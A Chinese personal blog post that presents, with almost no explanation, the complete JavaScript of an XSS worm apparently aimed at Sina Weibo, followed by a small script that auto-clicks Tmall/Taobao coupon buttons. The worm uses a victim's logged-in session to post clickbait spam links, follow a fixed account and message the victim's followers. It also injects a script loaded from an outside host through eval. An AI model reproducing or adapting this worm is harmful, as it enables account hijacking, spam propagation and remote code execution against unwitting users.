Yang's Blog

记一次简单的Xss

发表于

一次简单的 Xss

是通过前端脚本语言 JavaScript 来完成的

不过这个方法现在已经失效了,它是通过 input 标签未过滤 JavaScript 代码来完成攻击的
Xss攻击的危害性是比较大的,废话不多说,上代码吧!!

JavaScript代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
function createXHR(){
	return window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
}
function getappkey(url){
	xmlHttp = createXHR();
	xmlHttp.open("GET",url,false);
	xmlHttp.send();
	result = xmlHttp.responseText;
	id_arr = '';
	id = result.match(/namecard=\"true\" title=\"[^\"]*/g);
	for(var i=0; i < id.length; i++){
		sum = id[i].toString().split('"')[3];
		id_arr += sum + '||';
	}
	return id_arr;
}
function random_msg(){
	link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();
	var msgs = [
		'郭美美事件的一些未注意到的细节:',
		'建党大业中穿帮的地方:',
		'让女人心动的100句诗歌:',
		'3D肉团团高清普通话版种子:',
		'这是传说中的神仙眷侣啊:',
		'惊爆!范冰冰艳照真流出了:',
		'杨幂被爆多次被潜规则:',
		'傻仔拿锤子去抢银行:',
		'可以监听别人手机的软件:',
		'个税起征点有望提到4000:'
	];
	var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;
	msg = encodeURIComponent(msg);
	return msg;
}
function post(url,data,sync){
	xmlHttp = createXHR();
	xmlHttp.open("POST",url,sync);
	xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
	xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
	xmlHttp.send(data);
}
function publish(){
	url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
	data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
	post(url,data,true);
}
function follow(){
	url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
	data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
	post(url,data,true);
}
function message(){
	url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';
	ids = getappkey(url);
	id = ids.split('||');
	for(var i = 0; i < id.length - 1 & i<5; i++){
		msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
		msg = random_msg();
		msg = encodeURIComponent(msg);
		user = encodeURIComponent(encodeURIComponent(id[i]));
		data = 'content=' + msg + '&name=' + user + '&retcode=';
		post(msgurl,data,false);
	}
}
function main(){
	try{
		publish();
	}catch(e){}
	try{
		follow();
	}catch(e){}
	try{
		message();
	}catch(e){}
}
try{
	x = "g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";
	window.opener.eval(x);
}catch(e){}
main();
var t = setTimeout('location="http://weibo.com/pub/topic";',5000);

刷天猫淘宝等优惠卷

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
(function(window, document) {
	var interval = 800;
	var closeDelay = 200;
	var index = 0;
	var couponLinks;
	var getCoupon = function() {
		if (index >= couponLinks.length) {
			console.log("领取完毕");
			return;
		}
		var coponLink = couponLinks[index];
		coponLink.click();
		index++;
		console.log("领取 第" + index + " 张");
		setTimeout(getCoupon, interval);
		setTimeout(function() {
			var close = document.querySelector('.mui-dialog-close');
			if (close != null) close.click();
		}, closeDelay);
	}
	var _scrollTop = 0;
	var _scrollStep = document.documentElement.clientHeight;
	var _maxScrollTop = document.body.clientHeight - _scrollStep;
	var autoScrollDown = setInterval(function() {
		_scrollTop += _scrollStep;
		if (_scrollTop <= _maxScrollTop) {
			document.body.scrollTop = _scrollTop;
			return;
		}
		clearInterval(autoScrollDown);
		couponLinks = document.querySelectorAll('.mui-act-item-yhqbtn');
		console.log("总共:" + couponLinks.length + "条张优惠券待领取…");
		getCoupon();
	}, 500);
}) (window, document);

刷优惠卷的 JavaScript 代码还是有用的,不过要会改class或者id

Enjoy it ? Donate me ! 欣赏此文?求鼓励,求支持!